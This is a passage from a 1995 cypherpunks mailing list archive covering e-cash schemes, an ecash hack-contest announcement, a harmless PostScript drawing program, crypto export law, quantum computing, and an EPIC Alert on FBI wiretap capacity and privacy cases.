  be the case, if they do it right), it will initially get more
  adopters.

DigiCash will be limited to the Internet, Mondex is genuine cash, it allows
offline purse to purse transactions.

> One or both systems could be found to have serious security problems;
  who knows what the outcome of their discovery & exploitation would be?
  I know at least one group of people who believe they have a good line
  on a serious security problem in Mondex.

If they have the specs they are under an NDA. If you know people who know a
problem tell them to get in touch with Tim Jones, they are very keen to get the
best security possible.

I'm not sure that the conventional "publish everything" dogma of cypher
types is valid. I don't think they are relying on security through
obscurity, they simply want it in addition. Mondex is designed with two
security schemes to be exchanged at overlapping four year intervals.

> Even if the Mondex hardware were given away for free, think how
  much fun it is for the average user to add a new piece of hardware
  to their machines... ever install a sound card and CD-ROM drive on
  a PC? I remember reading something like 20% of all "multimedia"
  kits were returned, largely due to user install problems. If there
  is a competing method that costs the same and _doesn't_ require
  the hardware, people will tend go with this.

They need it to be plug 'n play. I expect this to happen.

> In my conversations with state and federal regulators, it is clear
  that it _is_ possible to issue spender-anonymous e-cash. If you ask
  them, "Hey, can I create fully anonymous digital cash?", they go
  apeshit, but if you explain that the money uses existing (auditable)
  channels going in, and existing (auditable) channels going out, and
  that only spenders are anonymous, they relax considerably. They may
  change their minds later, but we're about to get an existence proof.

All I know is that at the mention of DigiCash bankers start muttering
Regulation E.

> It's not clear that _either_ system is going to win completely in
  the next 10+ years. Although there's been considerable shakeout in
  the last ten years, there is still a huge variety of non-electronic
  payment methods -- how can you be so sure that Mondex will win over
  Digicash, and that they won't co-exist like, say, money orders,
  currency and cashier's checks (three instruments with both similar
  and dissimilar attributes)?

Quite probable, except that Mondex is a very credible scheme with very
large and very established names behind it. I haven't heard of Mark Twain
bank. I don't say that this predetermines the outcome, just that there are
reasons why one might have an advantage.


                Phill H-B
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 23 Oct 95 12:31:38 PDT
To: cypherpunks@toad.com
Subject: COMMUNITY CONNEXION TO OFFER REWARD FOR REVEALING HOLES IN ECASH
Message-ID: <199510231926.MAA01446@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


For Immediate Release
Contact: Sameer Parekh
	 sameer@c2.org
         510-601-9777 (pager: 510-321-1014)

COMMUNITY CONNEXION TO OFFER REWARD FOR REVEALING HOLES IN ECASH

October 23, 1995 - Community ConneXion, an internet privacy provider
in Berkeley, California, announced the extension of its existing
"Hack" contests to the electronic cash system announced today by
Digicash bv and Mark Twain Bank.

"The ecash deployment is an important step towards making internet
commerce more than just a curiosity," said Sameer Parekh, President of
Community ConneXion. The contest is meant, as with the other "Hack"
promotions being run by Community ConneXion, to encourage the
examination of the security of the ecash system so as to reveal holes
before they are exploited by a criminal element.

Community ConneXion hopes that the inquiry being done into the
security of these products results in a secure infrastructure for the
new paradigms provided by internet commerce. "All internet commerce
systems thus far released have been based in old, out-of-date,
insecure technology, such as credit cards. DigiCash is the first
revolutionary system which can change the way we do business," said
Parekh. "If the move to internet commerce does not radically improve
the way people do business, then we have not taken full advantage of
the potential inherent in the technology."

Details regarding the Hack DigiCash promotion are available on
Community ConneXion's webserver at http://www.c2.org/hackecash/.
Contest submissions should be sent to hackecash@c2.org.

Community ConneXion is the premier internet privacy ISP. They offer
anonymous accounts, remailers, and pseudonym servers, in addition to
the standard ISP fare of webspace and dialup IP access. Information is
available from http://www.c2.org/ or from sending email to
info@c2.org.

Ecash, DigiCash, Cyberbucks, and Mark Twain Bank are trademarks of
their respective owners. This promotion is not affiliated with
DigiCash bv nor Mark Twain Bank.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 23 Oct 95 12:36:39 PDT
To: cypherpunks@toad.com
Subject: Rising Sun Postscript Code
Message-ID: <199510231935.MAA09475@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I thought that with all of the talk about Postscript, I might demonstrate
what the language can do.  Here is a Postscript program which will run 
automatically on any machine.  I call it "Rising Sun".

Just attach your headers.


Domo Arigato,

                             Hara De Kangaeru


%--------------Prologue-------------
/inch
     { 72 mul }
     def

/rays
     {     0 5 180
           {    gsave
                     rotate
                     0 0 moveto
                     5 inch 0 rlineto
                     stroke
                grestore }
           for }
     def

/sunRays
    %called as: x y sunRays
    {     newpath
          translate
          .5 setlinewidth
          rays
          0 0 25 0 180 arc
          gsave
                1 setgray
                fill
          grestore
          2 setlinewidth
          stroke     }
     def

%-----------Script-----------
%first set font and show letters
/Helvetica-BoldOblique findfont
3 inch scalefont setfont
1 inch 5 inch translate
0 0 moveto
(SUN) false charpath
gsave
     stroke
grestore
%now set clipping path from restored text path
clip
gsave
     (SUN) stringwidth pop 2 div
     -10 sunRays
grestore
showpage




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Mon, 23 Oct 95 06:05:32 PDT
To: jbaber@mi.leeds.ac.uk
Subject: Re: crypto export from the UK
Message-ID: <25418.9510231303@dart.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Jon Baber <jbaber@mi.leeds.ac.uk> writes:
> sameer <sameer@c2.org> wrote:
> > 	Could people in the UK please tell me what the crypto export
> > laws are like there? I know someone who wrote some really great crypto
> > code in the UK but isn't willing to distribute it because of crypto
> > export laws... I was under the impression that it was legal to export
> > crypto from the UK.
> 
> I believe that the laws regarding the export of crypto from the UK are
> very similar to the ITAR regs in the US.

I thought they were markedly different!

I always understood there were NO restrictions on crypto export,
import or use to western countries.  There used to be COCOM agreements
which said that you should get approval to send commercially produced
crypto to some blacklisted countries (Iraq, etc).  I also read that
the COCOM restrictions did not claim to apply to free software.

Anyway, I read that the COCOM agreement has expired, so none of this
applies anymore, even.

There are a number of surveys around, and the above is my
understanding from reading those.

If you have any thing else I should be reading I'd like to see it.

> However our Government seems to take the view that putting crypto
> software on the net is not exporting it, the exporting is done
> whenever anyone from an export restricted country downloads the
> software and is done by them rather than by the person who made the
> software available.

I also have heard this.

> Strong crypto is therefore openly available from a number of places in
> this country, particularly sable.ox.ac.uk at the university of Oxford.

Indeed.

> Of course IANAL and the government may change its mind about the
> interpretation of these things but I would expect that your
> acquaintance would be perfectly safe distributing his software via
> sable (the ftp site (and its predecessor) have been distributing
> crypto software for a number of years and I have not heard of any
> problems).

I think he would be safe emailing it, putting it on the WWW, or
posting it to USENET.  There are no selective access restrictions on
*any* crypto ftp/http sites that I know of in the UK (like various
ones in the US which make a show of enforcing the export restriction by
not allowing export to non-US domain names.)

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@coyote.csusm.edu>
Date: Mon, 23 Oct 95 13:07:17 PDT
To: BRUEN@mitlns.mit.edu
Subject: Re: airport security
Message-ID: <v03003704acb1a4f86721@[204.250.84.2]>
MIME-Version: 1.0
Content-Type: text/plain


>   Without actually agreeing with the FAA, the reason you can't have a name
>   other than your own on your ticket, as well as why you are required to
>   be in your assigned seat on take-off and landing is because if there is
>   a plane crash, they need to be able to identify an otherwise difficult
>   to identify body. This does have some relevance to airport security if
>   a plane is blown up.
>
I do not believe that this is true.

Southwest Airlines has "open seating" on all of their flights, where you
board and then sit in any seat that you choose. (IMHO, an annoying policy)

When a flight is (close to) full, and the flight is running late, many
flight attendants will instruct the last few passengers to "sit in any open
seat". I have seen this on Reno Air, American, and United.

-- Marshall

Marshall Clow
Aladdin Systems
mclow@coyote.csusm.edu
Warning: Objects in calendar are closer than they appear.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Mon, 23 Oct 95 10:18:49 PDT
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: Quantum Computation article
Message-ID: <Pine.SOL.3.91.951023122259.5612B-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain



David P. DiVincenzo from the IBM Research Division has written an article 
in the 13th October issue of SCIENCE magazine (vol. 270, pg. 255-261) 
entitled "Quantum Computation".  The article is nicely divided into 
subsections:

- Building blocks of quantum logic
- Quantum circuits
- Peter Shor's prime factorization
- The decoherence problem
- Outlook

From the outlook section "It is evident from this survey of the current 
state of the art in quantum experimental physics that the construction of 
quantum computers is presently in the most rudimentary stage, and that to 
even think about a procedure like Shor factorization, which might require 
millions of operations on thousands of qubits, might be absurdly premature."

If that is the good news for Cypherpunks, then the great news is the 
following.

". . even a few bits of quantum computation will be very useful in 
performing so-called Bell measurements, which could be used to implement 
quantum teleportation, in which an unknown quantum state can be 
transmitted to a remote location.  At perhaps the 10-qubit level, a 
quantum computer becomes capable of performing Schumacher's quantum 
coding, which would be of interest in the implementation of efficient 
quantum cryptography.  And at perhaps the 100-qubit level, a quantum 
computer becomes an efficient repeater for a noisy (that is partially 
decohered) quantum cryptographic link."

It looks like the advantages of quantum computing accrue to Alice and 
Bob, long before it becomes useful to Eve and Mallet.

A must read for aficionados of "alternative computing".

Here are some URLs from the references

http://vesta.physics.ucla.edu/~smolin/
(Quantum Information Page, Center for Advanced Accelerators)

http://eve.physics.ox.ac.uk/QChome.html
(Quantum Computation and Cryptography page, Clarendon Laboratory, Oxford 
University)

C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Mon, 23 Oct 95 14:12:23 PDT
To: frissell@panix.com
Subject: Re: This PROMISes to be odius
In-Reply-To: <199510191813.OAA13667@panix.com>
Message-ID: <199510232044.NAA10925@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:20 PM 10/18/95 -0400, Brad Dolan wrote:
>
>PR   10/18 0809  ORACLE INTRODUCES SOFTWARE TOOL FOR LAW ENFORCEMENT 
>
>Tool Helps Federal, State, Municipal Agencies Stop the Criminal Element
>
>     Oracle SIUSS represents a major step forward in the collection, storage
>and analysis of case intelligence information for complex conspiracies, violent
>crimes such as rape and murder, drug trafficking, and other major cases.
>

On a related note, the October 1995 issue of Signal (the Official
publication of AFCEA) had this blurb on Oracle's Secure Network
Services product (pg 26):

    "The company's Secure Network Services product is designed to deal
with Internet security issues.  This system is designed for the
structured query language (SQL)* networking family of products for
significant technology advancement in the client-server arena.  The
company is establishing agreements with firewall vendors, such as DEC,
Sun Microsystems, Trusted Information Systems and Secure Computing
Corporation in a new Internet Partners Venture.

    The Secure Network Services version 1.0 specifically deals with
encryption technology supporting RSA Data Security, Incorporated's RC4
encryption algorithm and digital encryption standards.  The RC4
digital encryption algorithm uses a secret, randomly generated 40-bit
key for every SQL* Net session.  All user network traffic, including
all data values, SQL* statements and stored procedure calls and
results, is safeguarded fully, according to Notargiacomo.  These
features support tamper-proof data transmission.

    The company's Secure Network Services Version 1.1 provides a
highly optimized 56-bit key U.S. data encryption standard (DES)
algorithm known as DES40, a version that combines DES with
international availability of a 40-bit key...

    ... MGen. Richard O'Lear, USAF (Ret.), an Oracle associate director,
notes that, with Secure Network Services, it virtually is impossible
for an intruder to alter or replay data or commands without
detection."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: banisar@epic.org (Dave Banisar)
Date: Mon, 23 Oct 95 10:47:52 PDT
To: cypherpunks@toad.com
Subject: EPIC Alert 2.12 (Wiretap regs, funding, FLIR)
Message-ID: <v02130501acb1932a30a3@[204.91.138.69]>
MIME-Version: 1.0
Content-Type: text/plain



     =============================================================

        @@@@  @@@@  @@@  @@@@      @    @     @@@@  @@@@  @@@@@
        @     @  @   @   @        @ @   @     @     @  @    @
        @@@@  @@@    @   @       @@@@@  @     @@@   @@@     @
        @     @      @   @       @   @  @     @     @  @    @
        @@@@  @     @@@  @@@@    @   @  @@@@  @@@@  @   @   @

     =============================================================
     Volume 2.12                                   October 23, 1995
     -------------------------------------------------------------

                         Published by the
           Electronic Privacy Information Center (EPIC)
                          Washington, DC
                          info@epic.org
                      http://www.epic.org/

            * Special Edition: National Wiretap Plan *

=======================================================================
Table of Contents
=======================================================================

 [1] FBI Wiretap Plan Exceeds Legislative Authority
      (and what you can do)
 [2] Illegal Bugging by US Agencies Continues
 [3] Status of Wiretap Funding
 [4] Court Rules Against Hi-tech Spy Devices
 [5] NTIA to Release Privacy "Policy"
 [6] Privacy Success -- Marketry Drops Plan to Sell Net Data
 [7] ACLU Civil Liberties Update / Privacy Rights Clearinghouse
 [8] Upcoming Conferences and Events

=======================================================================
[1] FBI Wiretap Plan Exceeds Legislative Authority
      (and what you can do)
=======================================================================

The FBI has released a dramatic "reinterpretation" of the Communications
Assistance for Law Enforcement Act (the "Digital Telephony" bill or
"CALEA"). In a Federal Register notice which outlines "capacity
requirements" for surveillance of the nation's communications
infrastructure, the FBI is claiming that compliance with CALEA requires
that telephone companies and other service providers in some regions of
the country build in enough surveillance capacity so that *one percent*
of all phone lines could be *simultaneously* wiretapped, calls isolated,
and forwarded to the FBI. This would permit wiretapping at a level at
least a thousand times greater than currently occurs in the United
States.  This level of surveillance is also far in excess of what
Congress intended when it enacted the CALEA. The rule, if adopted, will
lead to a radical change in the surveillance capabilities of the
government.

The methodology used to determine capacity requirements is also deeply
flawed. Wiretapping reports, as required by law, have always been based
on actual taps authorized, actual conversations intercepted, and actual
lines surveilled. These numbers are reported annually by the
Administrative Office of the U.S. Courts. The Bureau's proposed rule
attempts to shift from the analytic approach required by current wiretap
law to one that is based on percentages of total communications
activity. It is similar (in purpose and magnitude) to a government
agency that had received an annual appropriation of $12 m to argue by
regulation that it was now entitled to 1% of the federal budget (roughly
$18 b).

EPIC has filed a Freedom of Information Act request seeking all
documents relating to the development of this proposed rule.

WHAT YOU CAN DO:

 (a) Submit comments to the FBI.  Object to the "percentage approach" to
     wiretap capacity.  Urge the FBI to follow the current measurement
     of wiretapping, as reported annually by the Administrative
     Office of the U.S. Courts, which considers the actual number of
     wiretaps authorized. If you are a telephone customer, ask
     the FBI to address the privacy risks of unauthorized, illegal, or
     excessive wire surveillance. Comments should be submitted in
     triplicate to the Telecommunications Industry Liaison Unit
     (TILU), Federal Bureau of Investigation, P.O. Box 220450,
     Chantilly, VA 22022-0450. For further information, contact TILU
     at (800) 551-0336. Refer to your question as a "capacity notice"
     inquiry.

       ** Comments must be received by November 15, 1995.**

  (b) If you represent or work for a telecommunications company,
     equipment manufacturer, or service provider, assess carefully the
     cost and liability that this proposed federal regulation may impose
     on your company and the risk that it may expose your customers to
     illegal wiretapping. If you are interested in challenging the
     final FBI rule, contact EPIC and send us a copy of your comments.
     We are prepared to assist individuals and companies with a legal
     challenge.

The FBI Federal Register notice (October 16, 1995, Volume 60, Number
199, Pages 53643 - 53646) is available at:

   http://www.epic.org/wiretap/calea_notice_10_95.txt

EPIC will soon post a copy of its FOIA request and its comments on the
regulation to implement a national wiretap plan.

=======================================================================
[2] Illegal Bugging by U.S. Agencies Continues
=======================================================================

Reports of illegal wiretapping by U.S. agencies are on the rise. Last
week Japanese officials expressed concern over a report of CIA spying
during automotive trade talks earlier this year, and said they would ask
the United States to investigate, according to an October 16 Reuters
report. "This is certainly not a very pleasant matter," said Trade
Minister Ryutaro Hashimoto.  Ichiro Fujisaki, political minister at the
Japanese embassy "expressed the Japanese government's concern that
should the report be true, it could hurt our national sentiment and
U.S.-Japanese friendship and mutual trust."

The New York Times reported earlier that the Central Intelligence Agency
conducted electronic surveillance in the course of preparing reports for
American negotiators prior to an accord reached in June. The Times also
reported that U.S. Trade Representative Mickey Kantor "was regularly
supplied with information gathered about the Japanese negotiation
position by the CIA's Tokyo station and the National Security Agency,
which operates electronic eavesdropping equipment." (NYT, Oct. 14,
1995). The Washington Post confirmed the incident and noted that the
"eavesdropping reflected the U.S. intelligence community's increasing
involvement in economic and commercial information gathering since the
end of the Cold War."

The illegal wiretapping report follows an incident earlier this year
when French officials charged that the United States intelligence
agencies engaged in clandestine monitoring of trade negotiations.

Meanwhile, the President of Estonia was forced to resign following news
that he had engaged in secret wiretapping of political opponents.
According to the New York Times, residents of Estonia wondered whether
the days of Soviet police agents spying on citizens had returned. Newly
chosen President Lennart Mei called the scandal "a crisis of democracy."
 He said, "We must ask ourselves: Does power belong to the people if
surveillance equipment is in the hands of others?"  (NYT, Oct. 18)

Estonia is the most recent country to see its government fall after
public disclosure of illegal wiretapping. In the last few years, Greece
and France have replaced political leaders because of wiretapping
scandals.

=======================================================================
[3] Status of Wiretap Funding
=======================================================================

In 1995 the Communications Assistance for Law Enforcement Act authorized
the expenditure of $500,000,000 over four years to reimburse companies
to design wiretap-ready communications technologies.  But opposition to
the "Digital Telephony" proposal forced the FBI and the White House to
find a creative way to fund the unpopular program.  Now the
Administration is proposing that the $500 M be gathered from a special
fund which authorizes the surcharge of 40 percent on all civil fines
levied by the United States after October 1, 1995, excluding fines
levied by the Internal Revenue Service. [The specific legislative
provision may be found in Title IV of the Counterterrorism Bill, HR 1710
(Civil Monetary Penalty Surcharges and Telecommunications Carrier
Compliance Payments).  The terrorism bill is now under consideration by
Congress and will be the subject of an upcoming EPIC Alert].

But even the "slush" fund may not generate enough money to reimburse
companies to design wiretap capabilities, which some industry experts
estimate may run in excess of $2 billion.  The House appropriations bill
for the Department of Justice sets aside only $50 M for the Telephone
Carrier Compliance program.

The U.S. Telephone Association earlier recommended that the government
follow traditional funding methods for the program rather than the
slush fund approach taken in the Counter-terrorism bill. The benefits
of such a budget, said the USTA, include the fact that "it brings the
process into the sunshine, making government surveillance expenditures
an issue for public scrutiny." (USTA Wiretap Workshop, May 1995). The
Office of Technology Assessment, before its demise, also prepared a
useful overview of the bill and discussed the funding issues --
"Electronic Surveillance in a Digital Age" (OTA 1995).

Further information about wiretapping is available at the EPIC web page:

   http://www.epic.org/privacy/wiretap/

=======================================================================
[4] Court Rules Against Hi-tech Spy Toys
=======================================================================

In a case that illustrates that the protections provided by the Fourth
Amendment against the intrusiveness of modern technologies are still
very much alive, the U.S. Court of Appeals for the 10th Circuit ruled on
October 4 that police must obtain a warrant before using Forward Looking
Infrared Radar (FLIR) devices to examine private residences. FLIR
measures heat differentials on surfaces of as little as 0.5 degrees
Celsius to determine activities inside homes. Police use FLIR devices to
scan neighborhoods and detect houses that emanate heat which may be
caused by "grow" lamps.

In U.S. v. Cusumano, No 94-8056, No 94-8057, Oct. 4, 1995, the court
ruled that new technologies do not eliminate the normal expectation of
privacy that individuals have in their homes. Echoing the words of
Justice Brandeis' opinion in a 1928 wiretap case, the court said:

   the Defendants need not have anticipated and guarded against
   every investigative tool in the government's arsenal. To hold
   otherwise would leave the privacy of the home at the mercy of the
   government's ability to exploit technological advances: the
   government could always argue that an individual's failure (or
   inability) to ward off the incursions of the latest scientific
   innovation forfeits the protection of the Fourth Amendment ... [T]he
   government would allow the privacy of the home to hinge upon the
   outcome of a technological race of measure/counter-measure between
   the average citizen and the government -- a race, we expect, that
   the people will surely lose.

Other courts have split on this question. Recently, the Washington State
Supreme Court ruled that a warrant is required before FLIR can be used
(State v. Young, 867 P.2d 593 (Wash. 1994)), while several other federal
appeals courts have ruled that the heat is "waste" not protected by the
Fourth Amendment.  The 10th Circuit opinion rejected the waste argument
"because the interpretation of that data allows the government to
monitor those domestic activities that generate a significant amount of
heat. It . . . strips the sanctuary of the home of one vital dimension
of its security: the 'right to be let alone' from the arbitrary and
discretionary monitoring of our actions by government officials."


=======================================================================
 [5] NTIA to Release Privacy "Policy"
=======================================================================

The National Telecommunications and Information Administration is
expected to release today (October 23) a white paper entitled "Privacy
and the NII: Safeguarding Telecommunications-Related Personal
Information." In an agency press release, NTIA administrator Larry
Irving said, "We hope to contribute to the effort of addressing the
public's concerns regarding the protection of their personal
information." NTIA says the paper will focus on "privacy concerns
associated with an individual's subscription to or use of a
telecommunications or information service."

But if the final NTIA report is at all similar to a privacy policy
discussed by an NTIA official at a conference earlier this month in
Bremen, Germany, there is little that will reassure the public about
this policy. Ignoring mounting evidence that voluntary codes have
failed and that new technologies of privacy should be promoted, the
NTIA recommends a "be careful out there" strategy, in effect saying that it
is better to post warning signs along the information highway than to
make the road safer to travel.

The NTIA proposal specifically recommends the "contract" approach to
privacy that was rejected by European officials earlier this year as
an inadequate safeguard for consumers using advanced communications
services.

NTIA officials, and other members of this Administration, have claimed
that with changing technology it is too difficult to legislate
effectively.  But a different group of public officials, facing a
similar challenge 20 years ago did not make such excuses. *Records,
Computers, and the Rights of Citizens* (1973) was a ground-breaking
report that spoke clearly of the need to protect citizens' rights, led to
passage of the Privacy Act of 1974, and established firmly the
importance of Fair Information Practices.  NTIA's report, like the other
privacy "policies" of this administration, will occupy no similar place
in history. The spirit of Clipper has infused this government.

Copies of the report are available from NTIA at 202/482-3999 and will
soon be posted at the EPIC web site with a complete critique.  EPIC has
also prepared a detailed review of an earlier administration privacy
code:

   http://www.epic.org/privacy/internet/epic_nii_privacy.txt


=======================================================================
[6] Privacy Success -- Marketry Drops Plan to Sell Net Data
=======================================================================

In a notable victory for consumer privacy and on-line activism, a
Bellevue, Washington company has backed off plans to sell personal
information gathered from the Internet following reports in the
Washington Post and a call to action in the EPIC Alert.  Marketry
President Norm Swent announced last week "Marketry's resignation as
manager of the email Internet Interest Selector list." However, Marketry
was not the compiler of the data. Another agent could still be found.

Washington Post reporter John Schwartz broke the Marketry story in the
paper's Business section following news of the proposal in the industry
trade publication The Friday Report. The Marketry data was to be
gathered from newsgroup posts, website visits, and chat room comments.

=======================================================================
 [7] ACLU Civil Liberties Alert / Privacy Rights Clearinghouse
=======================================================================

An excellent civil liberties on-line newsletter is the ACLU
Cyber-Liberties Update.

   To subscribe to the ACLU Cyber-Liberties Update, send an e-mail
   message to infoaclu@aclu.org with "subscribe ACLU" in the subject
   line of your message.  For more information about the newsletter,
   contact editor Ann Beeson, beeson@aclu.org.

One of the leading consumer privacy organizations in the country is
the Privacy Rights Clearinghouse in San Diego.  Formed in 1992, the
Clearinghouse has produced many consumer fact sheets on common privacy
concerns, and maintains a toll free hotline to provide advice to
consumers about their rights.

   More information about the Privacy Rights Clearinghouse is available
   at http://www.manymedia.com/prc/. 5998 Alcala Park, San Diego, CA
   92110. (619) 260-4806 (tel). 800-773-7748 (in Cal. only)
   prc@teetot.acusd.edu (email) Director: Beth Givens.

For a comprehensive guide to online privacy resources, check out:

    http://www.epic.org/privacy/privacy_resources_faq.html

=======================================================================
[8] Upcoming Privacy Related Conferences and Events
=======================================================================

SPECIAL: Ram Avrahami will discuss efforts to strengthen consumer
  privacy this week on NPR's Morning Edition and then on CNN Today. For
  more information, check out http://www.epic.org/privacy/junk_mail/

Smithsonian Institution, "Frontiers in Cyberspace: Encryption, Privacy,
and Cybercodes." October 25, 1995.  Marc Rotenberg, Director, Electronic
Privacy Information Center (EPIC), Philip Zimmermann, Creator, Pretty
Good Privacy (PGP); Stewart Baker, Attorney, Steptoe & Johnson, former
General Counsel, National Security Agency. Contact: Melody Curtis
(CurtisM@aol.com)

Managing the Privacy Revolution. October 31 - November 1, 1995.
Washington, DC. Sponsored by Privacy & American Business. Speakers
include Mike Nelson (White House) C.B. Rogers (Equifax). Contact Alan
Westin 201/996-1154.

Innovation and the Information Environment.  November 3-4. University
of Oregon School of Law in Eugene,  Oregon.  Contact: Keith Aoki
KAOKI@law.uoregon.edu.

National Privacy and Public Policy Symposium.  November 2-4, Hartford,
Cosponsored by the Connecticut Foundation for Open Government. Contact
Richard Akeroyd, rakeroyd@csunet.ctsateu.edu 203/566-4301 (tel),
203/566-8940 (fax)

22nd Annual Computer Security Conference and Exhibition. November 6-8,
Washington, DC. Sponsored by the Computer Security Institute.
Contact: 415-905-2626.

Global Security and Global Competitiveness: Open Source Solutions.
November 7-9. Washington, D.C. Sponsored by OSS. Contact: Robert Steele
oss@oss.net.

"The Right to Privacy," November 9.  Authors Caroline Kennedy and Ellen
Alderman discuss their new book on privacy.  Lizner Auditorium, George
Washington University, Washington, DC.  Contact 202/357-3030.

11th Annual Computer Security Applications Conference: Technical
papers, panels, vendor presentations, and tutorials that address the
application of computer security and safety technologies in the civil,
defense, and commercial environments. December 11-15, 1995, New Orleans,
Louisiana. Contact Vince Reed at (205)890-3323 or vreed@mitre.org.

RSA 6th Annual Data Security Conference:  Cryptography Summit.
Focus on the commercial applications of modern cryptographic technology,
with an emphasis on Public Key Cryptosystems. January 17-19, 1996.
Fairmont  Hotel, San Francisco.  Contact Layne Kaplan Events, at (415)
340-9300, e-mail at info@lke.com, or register at http://www.rsa.com/.

Computers Freedom and Privacy '96. March 27-30. Cambridge, Mass.
Sponsored by MIT, ACM and WWW Consortium. Contact cfp96@mit.edu or
http://www-swiss.ai.mit.edu/~switz/cfp96

Conference on Technological Assaults on Privacy, April 18-20, 1996.
Rochester Institute of Technology, Rochester, New York. Papers should
be submitted by February 1, 1996. Contact Wade Robison privacy@rit.edu,
by FAX at (716) 475-7120, or by phone at (716) 475-6643.

Australasian Conference on Information Security and Privacy June
24-26, 1996. New South Wales, Australia. Sponsored by Australasian
Society for Electronic Security and University of Wollongong. Contact:
Jennifer Seberry (jennie@cs.uow.edu.au).

Visions of Privacy for the 21st Century: A Search for Solutions.
May 9-11, 1996.  Victoria, British Columbia. Sponsored by The Office
of Information and Privacy Commissioner for the Province of British
Columbia and the University of Victoria. Program at
http://www.cafe.net/gvc/foi

18th International Conference of Data Protection and Privacy
Commissioners. Sponsored by the Privacy Commissioner of Canada.
September 18-20, 1996. Ottawa, Canada.

Advanced Surveillance Technologies II. Sponsored by EPIC and Privacy
International. September 17, 1995. Ottawa, Canada. Contact
pi@privacy.org

International Colloquium on the Protection of Privacy and Personal
Information. Commission d'acces a l'information du Quebec. May 1997.
Quebec City, Canada.

             (Send calendar submissions to Alert@epic.org)

=======================================================================

The EPIC Alert is a free biweekly publication of the Electronic
Privacy Information Center.  To subscribe, send the message:

    SUBSCRIBE CPSR-ANNOUNCE Firstname Lastname

to listserv@cpsr.org.  You may also receive the Alert by reading the
USENET newsgroup comp.org.cpsr.announce.

Back issues are available via http://www.epic.org/alert/ or
FTP/WAIS/Gopher/HTTP from cpsr.org /cpsr/alert/ and on Compuserve (Go
NCSA), Library 2 (EPIC/Ethics).


=======================================================================

The Electronic Privacy Information Center is a public interest
research center in Washington, DC.  It was established in 1994 to
focus public attention on emerging privacy issues relating to the
National Information Infrastructure, such as the Clipper Chip, the
Digital Telephony proposal, medical record privacy, and the sale of
consumer data.  EPIC is sponsored by the Fund for Constitutional
Government and Computer Professionals for Social Responsibility. EPIC
publishes the EPIC Alert and EPIC Reports, pursues Freedom of
Information Act litigation, and conducts policy research on emerging
privacy issues. For more information, email info@epic.org, WWW at
HTTP://www.epic.org or write EPIC, 666 Pennsylvania Ave., SE, Suite
301, Washington, DC 20003. (202) 544-9240 (tel), (202) 547-5482 (fax).

The Fund for Constitutional Government is a non-profit organization
established in 1974 to protect civil liberties and constitutional
rights.  Computer Professionals for Social Responsibility is a
national membership organization of people concerned about the impact
of technology on society.  For information contact: cpsr-info@cpsr.org

If you'd like to support the work of the Electronic Privacy Information
Center, contributions are welcome and fully tax-deductible.  Checks
should be made out to "The Fund for Constitutional Government" and sent
to EPIC, 666 Pennsylvania Ave., SE, Suite 301, Washington DC 20003.

Your contributions will help support Freedom of Information Act
litigation, strong and effective advocacy for the right of privacy and
efforts to oppose government regulation of encryption and funding of
the National Wiretap Plan.

Thank you for your support.

------------------------ END EPIC Alert 2.12 ------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dana W. Albrecht" <dwa@corsair.com>
Date: Mon, 23 Oct 95 14:24:54 PDT
To: cypherpunks@toad.com
Subject: Info: Elementrix POTP
Message-ID: <199510232119.OAA08030@elmos.corsair.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded from sci.crypt:

In article <45t9oh$6vd@newsbf02.news.aol.com>, whmurray@aol.com (WHMurray) writes:
> In article <45qkp5$8rh@netaxs.com>, grendel@netaxs.com (Michael Handler)
> writes:
> 
> >It 
> >looked somewhat like a stream cipher that generates its key by measuring 
> >packet lag over TCP/IP. General consensus was that any key determined 
> >from public information wasn't secure.
> 
> It uses a new symmetric message key for each message.  The key for message
> n is a function of that for message n-1 modulated by the content of
> message n-1.  However, it operates at the message layer, not the TCP/IP
> layer.  In a given population, everyone in the population can begin with
> the same key.  As messages are exchanged between any two parties in the
> population, they end up with a key which is unique to them.  The system is
> synchronous.  If any traffic between two parties is lost, they must
> re-synch; keys between each of the parties and other parties will not be
> affected.
> 
> The idea is novel and useful.   It will be resistant against most
> attackers.  It is much less resistant to attacks by nation states that
> could have a record of all traffic among all parties.  Of course it is not
> an OTP nor is it more secure than other modern systems.  If anything, it
> is a little less so, at least against those who have all of the traffic
> and to the extent that more than two parties start with the same initial
> key.  Of course, its strength is to permit all members of the population
> to begin with the same key while ensuring that members of the population
> are safe from each other.  It also ensures that compromise of the initial
> key is not sufficient to read traffic.  One must have all the intervening
> traffic.  Thus, if one comes to the party late, learning the initial key
> will not enable one to read current traffic.
> 
> >OTOH, I saw a press-release on Cypherpunks a week or two back that 
> >claimed Whitfield Diffie and David Kahn had both examined the algorithm 
> >under NDA, and both were blown away by it. OTOOH, I don't know how much 
> >Diffie and Kahn know about TCP/IP.
> 
> Diffie knows enough; Kahn less.  However, both are geniuses and know what
